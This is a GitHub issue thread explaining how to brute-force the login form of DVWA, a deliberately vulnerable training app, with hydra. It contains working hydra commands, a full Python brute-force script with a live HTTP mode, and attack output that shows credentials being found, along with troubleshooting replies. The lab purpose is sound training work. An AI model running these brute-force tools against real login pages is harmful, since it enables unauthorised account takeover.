SOLUTION: How to solve DVWA /vulnerabilities/brute/ #612

Open
vanhauser-thc opened this issue Mar 11, 2021 · 22 comments

Comments

@vanhauser-thc
Owner

vanhauser-thc commented Mar 11, 2021

As many people are not able to solve this easily - this is how to do it:

  1. Log into DVWA (login: admin, password: password)
  2. Collect your PHPSESSID cookie (e.g. look in your browser's cookie jar, use zaproxy, right mouseclick "inspect accessible properties" in firefox, etc.)
  3. `hydra -l admin -p password 'http-get-form://127.0.0.1/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:H=Cookie\:PHPSESSID=61p8up0thkqjft9vn5osv6afk2; security=low:F=Username and/or password incorrect'`
  4. profit

You can replace `-p password` with `-P` and a file containing passwords, e.g. `-P passwords.txt`.

Note: you need hydra 9.0, or better 9.2+. hydra 9.1 has a bug in the module and does not work.
If your Linux distribution comes with an old version, contact the package maintainer or compile hydra yourself.
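The procedure above, as an added worked example that is not code from hydra, DVWA or the issue author: a plain-Python equivalent of the http-get-form one-liner, so the three moving parts are explicit: the GET form fields, the PHPSESSID/security cookie that the brute page requires, and the F=/S= condition. It assumes DVWA at 127.0.0.1:80 under /vulnerabilities/brute/ and relies on DVWA redirecting requests without a logged-in session to login.php; the fake_dvwa() stand-in, the session id and the credentials in it are constructed so the script runs offline. It also shows the caveat behind runs where every pair reports as valid: with a failure-string condition (F=), a dead session turns every redirect-to-login response into a "valid" hit, so the script probes the session first and defaults to the success string (S=).

```python
"""Added example: the DVWA brute-force in plain Python, mirroring the hydra
http-get-form one-liner from this thread. Not part of hydra or DVWA.
Assumed: DVWA at 127.0.0.1:80 under /vulnerabilities/brute/, and DVWA's
redirect to login.php when no logged-in session exists. fake_dvwa() is a
constructed stand-in so the script runs offline."""
import http.client
import urllib.parse
from typing import Callable, Dict, List, Tuple

FAIL_MARK = "Username and/or password incorrect."    # hydra's F= string
OK_MARK = "Welcome to the password protected area"   # hydra's S= string
Response = Tuple[int, Dict[str, str], str]           # status, headers, body
Fetch = Callable[[str, Dict[str, str]], Response]


class SessionLost(RuntimeError):
    """PHPSESSID missing or expired: DVWA bounced the request to login.php."""


def build_request(user: str, password: str, phpsessid: str,
                  security: str = "low",
                  path: str = "/vulnerabilities/brute/") -> Tuple[str, Dict[str, str]]:
    """The request hydra sends for
    path:username=^USER^&password=^PASS^&Login=Login:H=Cookie: PHPSESSID=..; security=.."""
    query = urllib.parse.urlencode({"username": user, "password": password, "Login": "Login"})
    return f"{path}?{query}", {"Cookie": f"PHPSESSID={phpsessid}; security={security}"}


def judge(resp: Response, mode: str) -> bool:
    """Credential decision the way hydra's condition string makes it.
    'F': valid unless FAIL_MARK is in the body, so ANY unexpected page
         (e.g. an empty redirect to login.php) counts as valid.
    'S': valid only if OK_MARK is in the body."""
    body = resp[2]
    if mode == "F":
        return FAIL_MARK not in body
    if mode == "S":
        return OK_MARK in body
    raise ValueError(f"mode must be 'F' or 'S', got {mode!r}")


def bounced_to_login(resp: Response) -> bool:
    """True when DVWA answered with a redirect to login.php (no session)."""
    status, headers, _ = resp
    loc = {k.lower(): v for k, v in headers.items()}.get("location", "")
    return status in (301, 302, 303) and "login.php" in loc


def session_alive(fetch: Fetch, phpsessid: str, security: str = "low") -> bool:
    """Probe once before spraying: a dead session makes F= report every pair valid."""
    path, headers = build_request("probe", "probe", phpsessid, security)
    return not bounced_to_login(fetch(path, headers))


def attack(fetch: Fetch, users: List[str], passwords: List[str], phpsessid: str,
           mode: str = "S", security: str = "low") -> List[Tuple[str, str]]:
    """Try every user/password pair; stop at the first hit for each user."""
    if not session_alive(fetch, phpsessid, security):
        raise SessionLost("redirected to login.php: refresh PHPSESSID and retry")
    found = []
    for user in users:
        for password in passwords:
            path, headers = build_request(user, password, phpsessid, security)
            resp = fetch(path, headers)
            if bounced_to_login(resp):
                raise SessionLost("session died mid-run")
            if judge(resp, mode):
                found.append((user, password))
                break
    return found


def live_fetch(host: str = "127.0.0.1", port: int = 80) -> Fetch:
    """Real transport against a running DVWA (assumed host/port)."""
    def fetch(path, headers):
        conn = http.client.HTTPConnection(host, port, timeout=10)
        conn.request("GET", path, headers=headers)
        r = conn.getresponse()
        return r.status, dict(r.getheaders()), r.read().decode("utf-8", "replace")
    return fetch


def fake_dvwa(valid_sessions=frozenset({"61p8up0thkqjft9vn5osv6afk2"}),
              creds=frozenset({("admin", "password")})) -> Fetch:
    """Constructed stand-in for DVWA's brute page (session id and creds made up)."""
    def fetch(path, headers):
        cookies = dict(c.strip().split("=", 1)
                       for c in headers.get("Cookie", "").split(";") if "=" in c)
        if cookies.get("PHPSESSID") not in valid_sessions:
            return 302, {"Location": "../../login.php"}, ""
        qs = urllib.parse.parse_qs(urllib.parse.urlsplit(path).query)
        pair = (qs.get("username", [""])[0], qs.get("password", [""])[0])
        if pair in creds:
            return 200, {}, f"<p>{OK_MARK} {pair[0]}</p>"
        return 200, {}, f"<pre><br />{FAIL_MARK}</pre>"
    return fetch


if __name__ == "__main__":
    fetch = fake_dvwa()   # swap for live_fetch() to run against a real DVWA
    print(attack(fetch, ["admin"], ["123456", "admin", "password"], "61p8up0thkqjft9vn5osv6afk2"))
```

Against a real instance, replace fake_dvwa() with live_fetch() and pass the PHPSESSID copied from the browser; the probe in attack() fails fast if that cookie has expired instead of reporting the whole wordlist as valid.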

@vanhauser-thc vanhauser-thc pinned this issue Mar 11, 2021
@vanhauser-thc vanhauser-thc changed the title How to solve DVWA /vulnerabilities/brute/ SOLUTION: How to solve DVWA /vulnerabilities/brute/ Mar 11, 2021
@khybermunsef

khybermunsef commented Jan 29, 2023

`hydra 176.152.21.45 http-form-post "/dvwa/login.php:username=^USER^&password=^PASS^&Login=submit:Login failed" -L username.txt -P passwords.txt`

Note: 176.152.21.45 is the target IP and /dvwa/login.php is the target address; don't add http or https in front of it. `username` is the field name of the user name and `password` is the field name of the password; you can find them in the source code. "Login failed" is the message printed on the web page when you enter a wrong username and password, and `Login` is the name of the login button in the source code. username.txt and passwords.txt are the lists of usernames and passwords and should be saved in the same directory where you run this command. Good luck.

@elfshed

elfshed commented Feb 1, 2023

I am trying to brute force DVWA with the command `hydra 192.168.22.132 -l admin -P /usr/share/wordlists/rockyou.txt http-get-form "/dvwa/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:F=Username and/or password incorrect.:H=Cookie: security=high; PHPSESSID=bf132de2b2b47b73"`

but Hydra keeps giving the error below: `[ERROR] no valid optional parameter type given: F`

Can someone tell me what I am doing wrong?

It seems the F= or S= parameters need to be at the end, e.g. this works:

$ hydra  -I -l admin -p password \
  -e ns  -F  -u  -t 4  -w 15  -v  -V  127.0.0.1 -s 8000  http-get-form \
  "/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:H=Cookie\: security=medium; PHPSESSID=${SESSIONID}:S=Welcome to the password protected area"

Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-02-01 14:15:40
[INFORMATION] escape sequence \: detected in module option, no parameter verification is performed.
[VERBOSE] More tasks defined than login/pass pairs exist. Tasks reduced to 3
[DATA] max 3 tasks per 1 server, overall 3 tasks, 3 login tries (l:1/p:3), ~1 try per task
[DATA] attacking http-get-form://127.0.0.1:8000/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:H=Cookie\: security=medium; PHPSESSID=8ec4228fc3f12d91b9086c9ddec1b51d:S=Welcome to the password protected area
[VERBOSE] Resolving addresses ... [VERBOSE] resolving done
[ATTEMPT] target 127.0.0.1 - login "admin" - pass "admin" - 1 of 3 [child 0] (0/0)
[ATTEMPT] target 127.0.0.1 - login "admin" - pass "" - 2 of 3 [child 1] (0/0)
[ATTEMPT] target 127.0.0.1 - login "admin" - pass "password" - 3 of 3 [child 2] (0/0)
[8000][http-get-form] host: 127.0.0.1   login: admin   password: password
[STATUS] attack finished for 127.0.0.1 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-02-01 14:15:41

This fails:

$ hydra  -I -l admin -p password \
  -e ns  -F  -u  -t 4  -w 15  -v  -V  127.0.0.1 -s 8000  http-get-form \
  "/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:S=Welcome to the password protected area:H=Cookie\: security=medium; PHPSESSID=${SESSIONID}"

Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-02-01 14:16:06
[INFORMATION] escape sequence \: detected in module option, no parameter verification is performed.
[VERBOSE] More tasks defined than login/pass pairs exist. Tasks reduced to 3
[DATA] max 3 tasks per 1 server, overall 3 tasks, 3 login tries (l:1/p:3), ~1 try per task
[DATA] attacking http-get-form://127.0.0.1:8000/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:S=Welcome to the password protected area:H=Cookie\: security=medium; PHPSESSID=8ec4228fc3f12d91b9086c9ddec1b51d
[VERBOSE] Resolving addresses ... [VERBOSE] resolving done
[ERROR] no valid optional parameter type given: S

@eoswins

eoswins commented Feb 2, 2023

I am trying to brute force DVWA with the command `hydra 192.168.22.132 -l admin -P /usr/share/wordlists/rockyou.txt http-get-form "/dvwa/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:F=Username and/or password incorrect.:H=Cookie: security=high; PHPSESSID=bf132de2b2b47b73"`

but Hydra keeps giving the error below: `[ERROR] no valid optional parameter type given: F`

Can someone tell me what I am doing wrong?

Check this out, my first try:

You see it doesn't like 'Username and' and wants it in the format X=value. Then when I specify F=Username and it says there's no valid optional parameter type given: F.

This seems like a bug in my opinion, what do you guys think?

@eoswins

eoswins commented Feb 2, 2023

(quoting the solution from @vanhauser-thc above)

Have you tried this with a username and password file? It thinks all my username/password combinations are correct. To me it looks like it's ignoring the F argument. (This will look like it works fine if you just run the correct user and pass, specifying -l and -p.)

@elfshed

elfshed commented Feb 2, 2023

(quoting @eoswins above)

If you specify the F= parameter it has to be the last parameter specified, e.g. after the cookie headers in your example.

@ZackInMA

ZackInMA commented Mar 2, 2023

I'm having the same issue on a box in Hack the Box. It seems like Hydra just does not evaluate some of the response headers, no matter how you structure your command. I've filed another bug report on it myself.

@AndrewChedid

AndrewChedid commented Aug 17, 2023

Hello, I'm new to cybersecurity and am trying to brute force dvwa on low.

I am running this command:

hydra -L usernames.txt -P rockyou.txt -s 80 127.0.0.1 http-get-form "/dvwa/vulnerabilities/brute/index.php:username=^USER^&password=^PASS^&Login=Login:Username and/or password incorrect.:H=Cookie:security=low; PHPSESSID=cfdrv2bm5folucadb2fs15o223" -I

Between each [ATTEMPT] message in the CLI, I am getting an "[ERROR] Caught unkown error code, exiting!" message.
I'm also getting `[ERROR] optional parameters must have the format X=value: username=^USER^&password=^PASS^&Login=Login:incorrect:H=Cookie: security=low; PHPSESSID=cfdrv2bm5folucadb2fs15o223`

Does anyone know as to why this might be happening?

@zlh123123

(quoting @eoswins and the reply from @elfshed above)

I met this same problem and solved it this way!
Thanks!
The command below actually works:

`hydra -l admin -P test.txt 192.168.146.140 http-get-form "/dvwa/vulnerabilities/brute/index.php:username=^USER^&password=^PASS^&Login=Login:H=Cookie: security=Low;PHPSESSID=54a3cb472f9a7a86e8d02053804c4972:F=Username and/or password incorrect."`
